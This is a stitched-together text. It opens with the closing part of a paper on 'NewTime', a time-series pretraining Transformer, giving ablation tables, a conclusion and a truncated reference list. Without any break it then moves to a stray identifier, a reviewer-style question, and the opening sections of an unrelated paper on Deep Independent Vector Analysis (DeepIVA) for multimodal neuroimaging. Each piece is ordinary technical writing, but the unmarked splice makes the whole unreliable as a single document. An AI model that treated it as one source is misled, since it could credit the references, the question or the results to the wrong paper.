We conduct ablation studies on the 128 UCR datasets. We report the average performance obtained by either finetuning the model from the pretrained checkpoint or training the model from scratch. All results are averages of 5 runs.

Data Normalization and Encoding We first study various ways to preprocess and normalize the data while keeping the overall Transformer backbone. We consider Z-score, instance normalization and no preprocessing at all (i.e., identity) for the input sequence. A linear layer and a LayerNorm are used to encode windows to tokens. We also consider alternative methods proposed in PLE (Gorishniy et al., 2022) to encode the mean and std scalars.
In Table 4, our numerically multi-scaled embedding outperforms all the baselines. The PLE method relies on the quantiles of the training dataset and is thus difficult to scale properly when the data is complex and large.

Table 4: Ablation study for various data encoding and normalization methods.

| Encoding | Fine-tune Acc. | Fine-tune Macro-F1 | From Scratch Acc. | From Scratch Macro-F1 |
|----------|----------------|--------------------|-------------------|-----------------------|
| Z-score | 80.88±0.13 | 76.75±0.46 | 76.59±0.35 | 71.26±0.92 |
| IN | 79.97±0.54 | 75.47±0.84 | 75.38±0.60 | 69.73±0.98 |
| Identity | 82.02±0.29 | 78.12±0.40 | 73.53±0.30 | 67.13±0.53 |
| PLE-Q | 84.41±0.10 | 81.97±0.18 | 77.86±0.59 | 72.57±0.80 |
| PLE-T | 83.59±0.14 | 80.97±0.19 | 73.25±0.69 | 66.84±1.05 |
| PLE-P | 84.20±0.29 | 81.69±0.37 | 69.34±0.70 | 62.43±0.70 |
| Ours | 86.87±0.11 | 84.74±0.18 | 79.30±0.84 | 74.09±1.48 |

Number of Numerical Scales We vary the number of multipliers $k$ in our multi-scaled numerical data embedding module. In Table 5, the performance improves from a single scale to 9 scales in the transfer setting. This shows that the capability to encode multi-scaled data is critical and that our method provides an effective solution. Training from scratch attains its best results with 5 scales. Since the individual datasets are relatively small, this number of scales is sufficient in that case.

Table 5: Ablation study for varying the number of scales in the numerical embedding module.

| Num. Scales | Fine-tune Acc. | Fine-tune Macro-F1 | From Scratch Acc. | From Scratch Macro-F1 |
|-------------|----------------|--------------------|-------------------|-----------------------|
| 0 | 80.48±0.05 | 77.43±0.10 | 68.14±0.40 | 61.43±0.62 |
| 1 | 86.45±0.20 | 84.01±0.36 | 74.19±0.54 | 67.64±1.23 |
| 3 | 86.64±0.18 | 84.11±0.29 | 78.32±0.66 | 73.01±0.92 |
| 5 | 86.74±0.13 | 84.35±0.33 | 79.30±0.84 | 74.09±1.48 |
| 7 | 86.79±0.14 | 84.57±0.13 | 78.89±0.70 | 73.72±0.78 |
| 9 | 86.87±0.11 | 84.74±0.18 | 78.58±0.45 | 73.13±0.95 |

Figure 6: Accuracy comparison of NewTime and (a) HIVE-COTE2.0 (Middlehurst et al., 2021b), (b) ROCKET (Dempster et al., 2020) and (c) HIVE-COTE1.0 (Lines et al., 2016) on 26 datasets from the UEA archive. Each subfigure's title displays a win/tie/loss comparison between NewTime and the other method. The two dotted lines indicate the 5% interval.

Pretraining Data As many works study self-supervised transfer learning within the same domain (Eldele et al., 2021b; Yue et al., 2022; Zhang et al., 2022), we also pretrain our model on each individual dataset from the UCR archive and evaluate the performance on the same dataset. This achieves an accuracy of 79.7% and a Macro-F1 score of 74.8%, much lower than our large-scale pretraining results of 86.9% accuracy and 84.7% Macro-F1 score. This suggests that our model successfully learns a transferable representation from large-scale data. More ablation studies on window size and embedding dimension are provided in Appendix D.

5 CONCLUSION

In this paper, we propose the NewTime model for large-scale time series pretraining. The model is based on the Transformer architecture, which takes as input a set of tokens from non-overlapping windows. Each window is represented by its normalized shape, the window mean and the window standard deviation. We further develop a multi-scaled numerical embedding method for representing the scalar values of the mean and std. The model is able to take the raw values of time-series data as input without requiring any data normalization or transformation.
To demonstrate that the proposed model can learn numerical structures with different scales of variation, we conduct the first large-scale pretraining on a dataset with great domain diversity. The pretrained model achieves state-of-the-art performance when transferred to downstream classification benchmarks. We hope that this work will pave the way to general-purpose foundation models for time-series analysis.

Limitations The proposed method aims to effectively encode time-series data from diverse domains. It is not yet able to decode the representation back to a numerical value at the original scale, and thus it is not suitable for forecasting problems. The learned representation may be subject to biases and inequalities present in the training data, and the model may behave unexpectedly on data it never sees during training.

REFERENCES

Ralph G Andrzejak, Klaus Lehnertz, Florian Mormann, Christoph Rieke, Peter David, and Christian E Elger. Indications of nonlinear deterministic and finite-dimensional structures in time series of brain electrical activity: Dependence on recording region and brain state. *Physical Review E*, 64(6):061907, 2001.

Davide Anguita, Alessandro Ghio, Luca Oneto, Xavier Parra Perez, and Jorge Luis Reyes Ortiz. A public domain dataset for human activity recognition using smartphones. In *Proceedings of the 21st International European Symposium on Artificial Neural Networks, Computational Intelligence and Machine Learning*, pp. 437–442, 2013.

Jimmy Lei Ba, Jamie Ryan Kiros, and Geoffrey E Hinton. Layer normalization. *arXiv preprint arXiv:1607.06450*, 2016.

Anthony Bagnall, Hoang Anh Dau, Jason Lines, Michael Flynn, James Large, Aaron Bostrom, Paul Southam, and Eamonn Keogh. The UEA multivariate time series classification archive, 2018. *arXiv preprint arXiv:1811.00075*, 2018.

Aaron Bostrom and Anthony Bagnall. Binary shapelet transform for multiclass time series classification. In *Big Data Analytics and Knowledge Discovery: 17th International Conference, DaWaK 2015, Valencia, Spain, September 1-4, 2015, Proceedings 17*, pp. 257–269. Springer, 2015.

Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, et al. Language models are few-shot learners. *Advances in Neural Information Processing Systems*, 33:1877–1901, 2020.

Mathilde Caron, Hugo Touvron, Ishan Misra, Hervé Jégou, Julien Mairal, Piotr Bojanowski, and Armand Joulin. Emerging properties in self-supervised vision transformers. In *Proceedings of the IEEE/CVF International Conference on Computer Vision*, pp. 9650–9660, 2021.

Gari D Clifford, Chengyu Liu, Benjamin Moody, H Lehman Li-wei, Ikaro Silva, Qiao Li, AE Johnson, and Roger G Mark. AF classification from a short single lead ECG recording: The PhysioNet/Computing in Cardiology Challenge 2017. In *2017 Computing in Cardiology (CinC)*, pp. 1–4. IEEE, 2017.

Hoang Anh Dau, Anthony Bagnall, Kaveh Kamgar, Chin-Chia Michael Yeh, Yan Zhu, Shaghayegh Gharghabi, Chotirat Ann Ratanamahatana, and Eamonn Keogh. The UCR time series archive. *IEEE/CAA Journal of Automatica Sinica*, 6(6):1293–1305, 2019.

Angus Dempster, François Petitjean, and Geoffrey I Webb. ROCKET: exceptionally fast and accurate time series classification using random convolutional kernels. *Data Mining and Knowledge Discovery*, 34(5):1454–1495, 2020.

Jiaxiang Dong, Haixu Wu, Haoran Zhang, Li Zhang, Jianmin Wang, and Mingsheng Long.
SimMTM: A simple pre-training framework for masked time-series modeling. *arXiv preprint arXiv:2302.00861*, 2023.

Alexey Dosovitskiy, Lucas Beyer, Alexander Kolesnikov, Dirk Weissenborn, Xiaohua Zhai, Thomas Unterthiner, Mostafa Dehghani, Matthias Minderer, Georg Heigold, Sylvain Gelly, et al. An image is worth 16x16 words: Transformers for image recognition at scale. In *International Conference on Learning Representations (ICLR)*, 2020.

Emadeldeen Eldele, Mohamed Ragab, Zhenghua Chen, Min Wu, Chee Keong Kwoh, Xiaoli Li, and Cuntai Guan. Time-series representation learning via temporal and contextual contrasting. *arXiv preprint arXiv:2106.14112*, 2021a.

Emadeldeen Eldele, Mohamed Ragab, Zhenghua Chen, Min Wu, Chee Keong Kwoh, Xiaoli Li, and Cuntai Guan. Time-series representation learning via temporal and contextual contrasting. In *Proceedings of the Thirtieth International Joint Conference on Artificial Intelligence, IJCAI-21*, pp. 2352–2359, 2021b.
77N93tc3o5
Could you please describe the datasets used in the experiments, and relate them to the DeepIVA model? What aspect of the neuroimaging data used in the experiments is supposed to be modelled with a statistical dependence across datasets/subjects (i.e., among components of $\mathbf{s}_i$)?
DEEP INDEPENDENT VECTOR ANALYSIS

Anonymous authors
Paper under double-blind review

ABSTRACT

We introduce a deep multivariate latent variable model, Deep Independent Vector Analysis (DeepIVA), for learning linked and identifiable latent sources across multiple data modalities by unifying multidataset independent subspace analysis (MISA) and identifiable variational autoencoders (iVAE). DeepIVA aims to learn hidden linkage information via the MISA loss to attain latent cross-modal alignment while leveraging the identifiability properties of the iVAE to ensure proper unimodal disentanglement. We propose a stricter set of performance measures, facilitating comprehensive evaluation. We demonstrate that DeepIVA can successfully recover nonlinearly mixed multimodal sources on multiple synthetic datasets compared with iVAE and MISA. We then apply DeepIVA on a large multimodal neuroimaging dataset, and show that DeepIVA can reveal linked imaging sources associated with phenotype measures.

1 INTRODUCTION

One fundamental problem in representation learning is how to learn the latent variables used to generate the data. In blind source separation (BSS) (Silva et al., 2016), independent component analysis (ICA) (Comon, 1994) aims to recover latent sources that are statistically independent, but there is no guarantee of identifiability in general without additional assumptions. Notably, the solution of a linear ICA problem is identifiable only when at most one of the latent sources is Gaussian (Comon, 1994). The solution of a nonlinear ICA problem, on the other hand, is highly non-unique without additional restrictions (Hyvärinen & Pajunen, 1999). If the learned sources are not identifiable, it is impossible to reveal the underlying structure of the data. Recent advancements in nonlinear ICA theory have shown how to recover identifiable latent sources, mixed nonlinearly, up to trivial indeterminacies by introducing auxiliary information (Hyvarinen & Morioka, 2016; Hyvarinen et al., 2019; Khemakhem et al., 2020). Specifically, the identifiable variational autoencoder (iVAE) (Khemakhem et al., 2020) has been proved to recover nonlinearly mixed sources up to permutations or sign flips by utilizing auxiliary variables such as time indices or class labels. It assumes that sources are conditionally independent given such auxiliary variables, in the form of an exponential family distribution. Apart from identifiability, we are often interested in learning linked representations from multiple data modalities, as each modality can only capture limited information about the data-generating system. For example, in the field of neuroimaging, structural magnetic resonance imaging (sMRI) can reveal the static anatomical structure of the brain in high resolution, while functional magnetic resonance imaging (fMRI) can capture temporal dynamics at the cost of lower spatial resolution. Jointly analyzing two imaging modalities can uncover cross-modal relationships that cannot be detected by a single imaging modality, providing new insights into structural and functional interactions in the brain and its disorders (Calhoun & Sui, 2016). Recent studies on multi-view BSS assume that observations from different views originate from a shared source variable and distinct additive noise variables (Richard et al., 2020, 2021; Pandeva & Forré, 2023; Gresele et al., 2020).
However, in the context of multimodal fusion, it is more reasonable to assume that each modality is generated by modality-specific latent variables which, in turn, are linked across modalities, rather than a shared set, especially for data modalities that are inherently heterogeneous. To identify linked sources from multiple datasets, a unified framework called multidataset independent subspace analysis (MISA) has been developed (Silva et al., 2020), encompassing multiple linear latent variable models, such as ICA (Comon, 1994), independent vector analysis (IVA) (Kim et al., 2006), and independent subspace analysis (ISA) (Cardoso, 1998). MISA can be applied to analyze both multi-subject and multimodal neuroimaging data. Building upon MISA, multimodal IVA (MMIVA) (Silva et al., 2021) and multimodal subspace IVA (MSIVA) (Li et al., 2023a) have recently been developed to capture one-to-one and many-to-many latent multimodal associations, respectively. In both cases, the learned linked latents are found to be significantly associated with phenotype measures such as age, sex and psychosis from large-scale multimodal neuroimaging datasets including sMRI and fMRI. Although both MMIVA and MSIVA assume that sources undergo a linear mixing process, it is possible that the true mixing process in neuroimaging data is actually nonlinear, considering nonlinear transformations in the modeling and preprocessing stages. For example, the hemodynamic response function that models the relationship between neural activities and fMRI signals is nonlinear, and preprocessing steps such as coregistration include nonlinear transformations. Nonlinear methods such as deep neural networks (LeCun et al., 2015) have been increasingly applied to neuroimaging data analysis, showing the potential to learn robust brain-phenotype relationships (Abrol et al., 2021). Here, we ask the question: How can we learn linked and identifiable latent sources that are nonlinearly mixed across multiple data modalities? Building upon MISA and iVAE, we develop a deep multivariate latent variable model, Deep Independent Vector Analysis (DeepIVA), to learn linked and identifiable latent sources from multiple data modalities. In DeepIVA, we utilize the iVAE to identify sources from each modality, and the MISA loss function to align sources across all modalities. We demonstrate that DeepIVA can effectively recover sources compared to iVAE and MISA on multiple synthetic datasets and a large multimodal neuroimaging dataset. Our key contributions are as follows:
• We propose a deep latent variable model, DeepIVA, to learn linked and identifiable representations from multimodal data by unifying MISA and iVAE;
• We propose multiple evaluation metrics, including segment-specific minimum distance and trimmed mean correlation coefficient, to comprehensively characterize model performance;
• We perform a systematic evaluation of model performance and demonstrate that DeepIVA can effectively learn linked and identifiable multimodal sources in multiple simulation configurations (different sources, segments, and observations per segment);
• We apply DeepIVA on a large multimodal neuroimaging dataset to identify biologically meaningful sources associated with phenotype measures (age and sex).
2 METHODS

2.1 DEEP INDEPENDENT VECTOR ANALYSIS

Independent Vector Analysis Independent vector analysis (IVA) (Kim et al., 2006) is a multivariate latent variable model which extends the ICA problem from a single dataset to multiple datasets and captures statistical dependence across datasets. IVA aims to identify linked vector sources across $M$ datasets or data modalities ($M > 1$) where each observation $x^m$ can be modeled as a linear mixture $A^m$ of statistically independent sources $s^m$:
$$x^m = A^m s^m,$$
where $x^m \in \mathbb{R}^V$ is an observation in the $m$-th dataset or data modality $X^m \in \mathbb{R}^{N \times V}$, $s^m \in \mathbb{R}^C$ is the source corresponding to the observation $x^m$, $A^m \in \mathbb{R}^{V \times C}$ is the invertible linear mixing matrix, $m \in [1, M]$ indexes the dataset or data modality, $N$ is the number of observations, $V$ is the number of features, and $C$ is the number of sources ($C \leq V$). Particularly, in neuroimaging data, the observations are the subjects and the features are the volume pixel (voxel) intensities. The IVA algorithm seeks to identify the sources $\hat{s}^m$ by learning a demixing matrix $W^m$: $\hat{s}^m = W^m x^m$. The IVA problem can be solved by minimizing the following mutual information loss (Adali et al., 2014):
$$L_{\text{IVA}} = \sum_{i=1}^{C} \left( \sum_{m=1}^{M} H(s_i^m) - I(s_i) \right) - \sum_{m=1}^{M} \log |\det W^m|,$$
where $H(\cdot)$ denotes the entropy, $I(\cdot)$ denotes the mutual information, and $s_i$ is the $i$-th source component vector (SCV), which spans the $M$ datasets: $s_i = [s_i^1, s_i^2, \ldots, s_i^M]^\top$. The IVA objective aims to minimize the mutual information among SCVs while capturing multimodal dependence among sources within each SCV.

Multidataset Independent Subspace Analysis (MISA) (Silva et al., 2020) is a unified framework encompassing multiple linear BSS models including ICA, IVA and ISA. MISA utilizes a multivariate Kotz distribution (Kotz, 1975) for SCV modeling:
\[ p_{\psi}(s_i) = \frac{\lambda^{\nu} \beta \, \Gamma\!\left(\frac{d_i}{2}\right)}{\pi^{d_i/2} (\det D_i)^{1/2} \, \Gamma(\nu)} \left(s_i^\top D_i^{-1} s_i\right)^{\eta - 1} e^{-\lambda \left(s_i^\top D_i^{-1} s_i\right)^{\beta}}, \]
where \( \psi = [\beta, \lambda, \eta] \) is the set of Kotz hyperparameters, and \( d_i \) is the \( i \)-th SCV dimension, here \( d_i = M \). We define \( \nu = \frac{2\eta + d_i - 2}{2\beta} > 0 \) and \( \alpha = \frac{\Gamma(\nu + \beta^{-1})}{\lambda^{\beta^{-1}} d_i \Gamma(\nu)} \) for brevity, where \( \Gamma(\cdot) \) denotes the gamma function. The positive definite dispersion matrix \( D_i \) is related to the SCV covariance matrix \( \Sigma_{s_i} \) as \( D_i = \alpha^{-1} \Sigma_{s_i} \). The Kotz distribution is highly flexible, as it encompasses the multivariate Gaussian distribution (\( \psi = [1, \frac{1}{2}, 1] \)) and the multivariate Laplace distribution (\( \psi = [\frac{1}{2}, 1, 1] \)).
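For reference, the Kotz log-density above can be evaluated as in the following sketch (the function name is ours; the defaults correspond to the multivariate Laplace setting $\psi = [\frac{1}{2}, 1, 1]$):

```python
import numpy as np
from scipy.special import gammaln

def kotz_logpdf(s, D, beta=0.5, lam=1.0, eta=1.0):
    """Log-density of a d-dimensional Kotz distribution for one SCV sample s,
    with dispersion matrix D and hyperparameters psi = [beta, lam, eta]."""
    d = s.shape[0]
    nu = (2 * eta + d - 2) / (2 * beta)
    q = s @ np.linalg.solve(D, s)                     # s^T D^{-1} s
    log_norm = (nu * np.log(lam) + np.log(beta) + gammaln(d / 2)
                - (d / 2) * np.log(np.pi)
                - 0.5 * np.linalg.slogdet(D)[1] - gammaln(nu))
    return log_norm + (eta - 1) * np.log(q) - lam * q ** beta

rng = np.random.default_rng(0)
s = rng.standard_normal(2)                            # one SCV with M = 2 modalities
print(kotz_logpdf(s, np.eye(2)))
```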
The MISA loss (Silva et al., 2020) is defined as the KL divergence between the joint distribution across all SCVs \( p_{\psi}(s) \) and the product of the Kotz distributions of each SCV \( p_{\psi}(s_i) \):
\[
L_{\text{MISA}}(W) = D_{\text{KL}}\Big(p_{\psi}(s) \,\Big\|\, \prod_{i=1}^{C} p_{\psi}(s_i)\Big) = - \sum_{m=1}^{M} J_{D_m} + \frac{1}{2} \sum_{i=1}^{C} J_{C_i} - f - \sum_{i=1}^{C} \frac{\eta - 1}{N} \sum_{n=1}^{N} J_{F_{in}} + \sum_{i=1}^{C} \frac{\lambda}{N} \sum_{n=1}^{N} J_{E_{in}},
\]
where \( J_{D_m} = \sum_{i=1}^{C} \ln |\sigma_i^m| \) and \( \{\sigma_i^m\}_{i=1}^{C} \) is the set of non-zero singular values of the demixing matrix \( W^m \), \( J_{C_i} = \ln |\det D_i| \), \( J_{F_{in}} = \ln(s_{in}^\top D_i^{-1} s_{in}) \), \( J_{E_{in}} = (s_{in}^\top D_i^{-1} s_{in})^{\beta} \), and \( f = \sum_{i=1}^{C} \left[ \ln \beta + \nu \ln \lambda + \ln \Gamma\left(\frac{d_i}{2}\right) - \frac{d_i}{2} \ln \pi - \ln \Gamma(\nu) \right] \).

Identifiable Variational Autoencoder The original MISA framework only includes linear BSS methods. In practice, we are also often interested in learning nonlinear mixtures, especially for high-dimensional data such as neuroimaging. Recently, the identifiable variational autoencoder (iVAE) (Khemakhem et al., 2020) has been proposed to recover latent sources that are nonlinearly mixed by conditioning the latents on auxiliary variables. It has also been proved that the iVAE can recover independent conditional latent variables while maximizing the likelihood of generating the data, thus bridging the gap between the iVAE and nonlinear ICA (see Appendix F in Khemakhem et al., 2020 for more details). Consider the following conditional unimodal generative model (Khemakhem et al., 2020):
\[ x^m = f^m(s^m) + \epsilon^m, \quad m = 1, \ldots, M, \]
\[ p_{\theta^m}(x^m, s^m \mid u) = p_{f^m}(x^m \mid s^m)\, p_{T^m,\lambda^m}(s^m \mid u), \]
\[ p_{f^m}(x^m \mid s^m) = p_{\epsilon^m}(x^m - f^m(s^m)), \]
\[ p_{T^m,\lambda^m}(s^m \mid u) = \prod_{i=1}^{C} \frac{Q_i^m(s_i^m)}{Z_i^m(u)} \exp \left[ \sum_{j=1}^{k} T_{i,j}^m(s_i^m)\,\lambda_{i,j}^m(u) \right], \]
where \( x^m \in \mathbb{R}^V \) and \( u \in \mathbb{R}^S \) are observed random variables, \( s^m \in \mathbb{R}^C \) (\( C \leq V \)) is a latent variable, \( \epsilon^m \in \mathbb{R}^V \) is an independent modality-specific noise variable with probability density function \( p_{\epsilon^m}(\epsilon^m) \), \( \theta^m = (f^m, T^m, \lambda^m) \) is the set of parameters of the conditional generative model, and \( f^m : \mathbb{R}^C \to \mathbb{R}^V \) is a nonlinear mixing function. We assume that the prior on the latent variables \( p_{T^m,\lambda^m}(s^m \mid u) \) is conditionally independent, and each unimodal source follows a univariate exponential family distribution given the auxiliary variable \( u \), where \( Q_i^m \) is the base measure, \( Z_i^m(u) \) is the normalizing constant, \( T_i^m = (T_{i,1}^m, \ldots, T_{i,k}^m) \) are the sufficient statistics, \( \lambda_i^m(u) = (\lambda_{i,1}^m(u), \ldots, \lambda_{i,k}^m(u)) \) are the parameters depending on \( u \), and \( k \) is the dimension of each sufficient statistic.
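As a concrete instance of the exponential family prior above (our illustration, not spelled out in this section): a conditionally Gaussian prior with segment-dependent mean and variance, as used in the synthetic experiments of Section 2.2, corresponds to \( k = 2 \) with
\[ p_{T^m,\lambda^m}(s_i^m \mid u) = \mathcal{N}\big(s_i^m \mid \mu_i^m(u), \sigma_i^m(u)^2\big), \quad T_i^m(s) = (s, s^2), \quad \lambda_i^m(u) = \left(\frac{\mu_i^m(u)}{\sigma_i^m(u)^2},\; -\frac{1}{2\sigma_i^m(u)^2}\right), \]
with base measure \( Q_i^m(s) = 1 \) and the normalizer \( Z_i^m(u) \) absorbing the Gaussian constant.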
Given a dataset \( D = \{(x^{m(n)}, u^{(n)})\}_{n=1}^{N} \) with \( N \) observations sampled from the generative model defined by Equations 5–8, the iVAE aims to learn the parameters \( (\theta^m, \phi^m) \) that maximize the data generation likelihood by maximizing the evidence lower bound (ELBO):
\[ L_{\text{iVAE}}(\theta^m, \phi^m) = \mathbb{E}_{q_D} \left[ \log p_{\theta^m}(x^m, s^m \mid u) - \log q_{\phi^m}(s^m \mid x^m, u) \right], \]
where \( q_D \) is the empirical distribution of the dataset \( D \), \( p_{\theta^m}(x^m, s^m \mid u) \) is the observed conditional joint distribution, and \( q_{\phi^m}(s^m \mid x^m, u) \) is the approximated posterior.

Figure 1: DeepIVA overview. Step 1: An iVAE is trained to recover sources for each of $M$ data modalities. Step 2: The MISA loss is applied to align sources across $M$ data modalities. Steps 1 and 2 are iterated until convergence.

The reparameterization trick (Kingma & Welling, 2013) is used to sample from a multivariate Gaussian distribution with a diagonal covariance, i.e., $q_{\phi^m}(s^m \mid x^m, u) = \mathcal{N}(s^m \mid g^m(x^m, u; \phi_{g^m}), I \sigma^2(x^m, u; \phi_{\sigma^m}))$. We implement an $L$-layer multilayer perceptron (MLP) as the backbone of the iVAE. The input dimension of the first layer in the encoder is equal to the sum of the feature dimension and the auxiliary information dimension. The input and output dimensions of each intermediate layer are the same, which doubles the feature size ($2V$). The output dimension of the last layer is again equal to the feature dimension. We use Leaky ReLU (Maas et al., 2013) as the activation function.

**Deep Independent Vector Analysis** Consider the following conditional multimodal generative model:
$$x^m = f^m(s^m) + \epsilon^m, \quad m = 1, \ldots, M,$$
$$p_\theta(x^1, \ldots, x^M, s^1, \ldots, s^M \mid u) = \left( \prod_{m=1}^{M} p_{f^m}(x^m \mid s^m) \right) p_{\theta_s}(s \mid u),$$
where we define
$$p_{f^m}(x^m \mid s^m) = p_{\epsilon^m}(x^m - f^m(s^m)),$$
$$p_{\theta_s}(s \mid u) = p_{\theta_s}(s^1, \ldots, s^M \mid u) = \prod_{i=1}^{C} p_{\theta_{s,i}}(s_i^1, \ldots, s_i^M \mid u).$$
Integrating $p_{\theta_s}(s \mid u)$ over $s_i^{m'}$, for all $i$ and all $m' \neq m$, implies the following (marginal) conditionally independent unimodal latent model:
$$p_{\theta_s}(s_1^m, \ldots, s_C^m \mid u) = \prod_{i=1}^{C} p_{\theta_{s,i}}(s_i^m \mid u).$$
Building upon MISA and iVAE, we propose Deep Independent Vector Analysis (DeepIVA) to learn linked and identifiable latent sources from multiple data modalities defined according to Equations 10–14 (Figure 1). Assuming the unimodal marginals $s_i^m \mid u$ follow a univariate exponential family distribution, we show that the learned model parameters and sources from DeepIVA are identifiable up to a permutation and component-wise transformation (Appendix A). In DeepIVA, an iVAE is first initiated for each data modality and then a single MISA module is initiated across all data modalities. The iVAE aims to recover sources for each modality, and the MISA module aims to identify the linkage of sources across modalities. At each epoch, we alternate between training the cross-modal MISA and the unimodal iVAEs. Specifically, we process one segment (segments are defined by the auxiliary variables) from all $M$ modalities at a time, and simultaneously update the encoder parameters for all modalities according to the MISA loss (Equation 4). We then update the iVAE model parameters (both encoder and decoder) using all segments simultaneously, for each of the $M$ modalities separately, following the iVAE loss (Equation 9). The MISA loss term $J_{D_m}$ in DeepIVA differs from the original MISA framework. Specifically, we compute the Jacobian matrix $\mathbf{J}^m$ of the nonlinear transformation parameterized by the MLP encoder $g^m$ for the $m$-th data modality. For computational efficiency, we approximate the determinant of each Jacobian by the determinant of the average Jacobian across samples, $\bar{\mathbf{J}}^m = \frac{1}{N} \sum_{n=1}^{N} \partial g^m(x^{m(n)})$. The loss term is defined as $J_{D_m} = \ln |\det \bar{\mathbf{J}}^m|$ if $\bar{\mathbf{J}}^m$ is a square matrix, and otherwise as $J_{D_m} = \sum_{i=1}^{C} \ln |\sigma_i^m|$, where $\{\sigma_i^m\}_{i=1}^{C}$ is the set of non-zero singular values of $\bar{\mathbf{J}}^m$ (i.e., the square roots of the non-zero eigenvalues of $\bar{\mathbf{J}}^m (\bar{\mathbf{J}}^m)^\top$). Additionally, since MISA is not designed to handle auxiliary information, we modify the original encoder architecture to distinguish between data features $x^m$ and auxiliary variables $u$ such that 1) the iVAE updates model parameters with respect to both $x^m$ and $u$ at the input layer, and 2) MISA updates only those pertaining to $x^m$ but not $u$. The original iVAE model uses a single input layer taking the concatenated $x^m$ and $u$. In DeepIVA, we split this layer into two: one for the data features $x^m$ and another for the auxiliary variables $u$. The parameters with respect to $u$ are only updated at the iVAE training step and remain frozen at the MISA training step. The inputs for the auxiliary variables are also set to 0 during MISA training to ensure no influence from the frozen weights.¹

¹ Code will be made publicly available upon acceptance.
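Pending the code release, the alternating schedule can be summarized in the following runnable PyTorch sketch. The encoders, decoders, and the two loss functions are simplified stand-ins (the real objectives are Equations 4 and 9), and all names are ours.

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

M, C, V, S, N = 2, 5, 10, 4, 400            # modalities, sources, features, segments, samples
X = [torch.randn(N, V) for _ in range(M)]   # toy observations per modality
u = torch.randint(0, S, (N,))               # segment labels (auxiliary variable)
U = F.one_hot(u, S).float()

encoders = nn.ModuleList(nn.Linear(V + S, C) for _ in range(M))
decoders = nn.ModuleList(nn.Linear(C, V) for _ in range(M))

def misa_loss(sources):                     # placeholder for the KL loss of Equation 4
    scv = torch.stack(sources, dim=-1)      # (batch, C, M) source component vectors
    return scv.pow(2).mean()

def neg_elbo(m, x, aux):                    # placeholder for the negative ELBO of Equation 9
    s = encoders[m](torch.cat([x, aux], dim=-1))
    return (decoders[m](s) - x).pow(2).mean()

enc_opt = torch.optim.Adam(encoders.parameters(), lr=1e-3 / S)   # MISA lr = iVAE lr / S
ivae_opts = [torch.optim.Adam(list(encoders[m].parameters()) +
                              list(decoders[m].parameters()), lr=1e-3) for m in range(M)]

for epoch in range(3):
    for seg in range(S):                    # MISA step: one segment at a time, encoders only
        idx = u == seg
        aux0 = torch.zeros(int(idx.sum()), S)       # auxiliary inputs zeroed out
        sources = [encoders[m](torch.cat([X[m][idx], aux0], dim=-1)) for m in range(M)]
        loss = misa_loss(sources)
        enc_opt.zero_grad(); loss.backward(); enc_opt.step()
    for m in range(M):                      # iVAE step: all segments, per modality
        loss = neg_elbo(m, X[m], U)
        ivae_opts[m].zero_grad(); loss.backward(); ivae_opts[m].step()
```

Note that with a single linear input layer and zeroed auxiliary inputs, the gradients of the auxiliary weights vanish automatically during the MISA step; the paper's split input layer makes this freezing explicit and architecture-independent.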
### 2.2 Synthetic Data Experiment

**Synthetic Data** We generate multimodal synthetic datasets including non-stationary multivariate Gaussian sources. Specifically, we simulate a dataset $\mathbf{X} \in \mathbb{R}^{N \times C \times M}$ where $N = O \times S$ is the number of total observations, $O$ is the number of observations per segment, $S$ is the number of segments, $C$ is the number of sources, and $M$ is the number of modalities. Here, we set $M = 2$, $C \in \{5, 10, 15\}$, $S \in \{14, 8, 4\}$, and $N \in \{2800, 5600\}$ to simulate real data, leading to 18 configurations in total. These configurations are chosen according to source identification performance in IVA tasks (Li et al., 2023b). For each segment, we generate a covariance matrix $\Sigma \in \mathbb{R}^{2C \times 2C}$ of both modalities, where the within-modality covariance matrices $\Sigma_{m,m} \in \mathbb{R}^{C \times C}$ along the main (block) diagonal are diagonal matrices with values sampled from a uniform distribution $[0.2, 4]$. The between-modality covariance $\Sigma_{m,m'} \in \mathbb{R}^{C \times C}$ ($m \neq m'$) along the off-diagonal block is then defined as a diagonal matrix with correlation values sampled from a uniform distribution $[0.7, 0.9]$ and scaled by the source standard deviations according to $\Sigma_{m,m}$. The data is then generated from a multivariate Gaussian distribution $\mathcal{N}(\mu, \Sigma)$, where $\mu \in \mathbb{R}^{2C}$ is sampled from a uniform distribution $[-3, 3]$. The auxiliary variable $u$ is the segment label with a uniform distribution on the integer set $[1, S]$. Latent variables within each modality are conditionally independent given the segment labels $u$. Synthetic sources are visualized in Appendix B.1. A neural network with $L = 2$ layers is employed as the nonlinear mixing function. For each layer, a Leaky ReLU (Maas et al., 2013) with a negative slope of 0.2 is used as the activation function. After the last Leaky ReLU layer, we multiply the mixed data from each modality by a different random orthogonal matrix $A$ to obtain the final mixed dataset $\mathbf{X}$.
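A NumPy sketch of the per-segment generation just described follows (layer widths and helper names are our assumptions):

```python
import numpy as np

rng = np.random.default_rng(0)
M, C, O = 2, 5, 200                                    # modalities, sources, obs per segment

def segment_covariance():
    """2C x 2C covariance: diagonal within-modality blocks, diagonal
    cross-modal block with correlations in [0.7, 0.9] scaled by source stds."""
    var = rng.uniform(0.2, 4.0, size=(M, C))
    rho = rng.uniform(0.7, 0.9, size=C)
    Sigma = np.zeros((M * C, M * C))
    for m in range(M):
        Sigma[m * C:(m + 1) * C, m * C:(m + 1) * C] = np.diag(var[m])
    cross = np.diag(rho * np.sqrt(var[0] * var[1]))
    Sigma[:C, C:], Sigma[C:, :C] = cross, cross
    return Sigma

def mix(s, L=2, slope=0.2):
    """L-layer random MLP with Leaky ReLU, then a random orthogonal matrix."""
    x = s
    for _ in range(L):
        x = x @ rng.standard_normal((C, C))
        x = np.where(x > 0, x, slope * x)              # Leaky ReLU
    Q, _ = np.linalg.qr(rng.standard_normal((C, C)))   # random orthogonal matrix
    return x @ Q

mu = rng.uniform(-3, 3, size=M * C)
s = rng.multivariate_normal(mu, segment_covariance(), size=O)     # one segment
X = [mix(s[:, m * C:(m + 1) * C]) for m in range(M)]              # mixed observations
```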
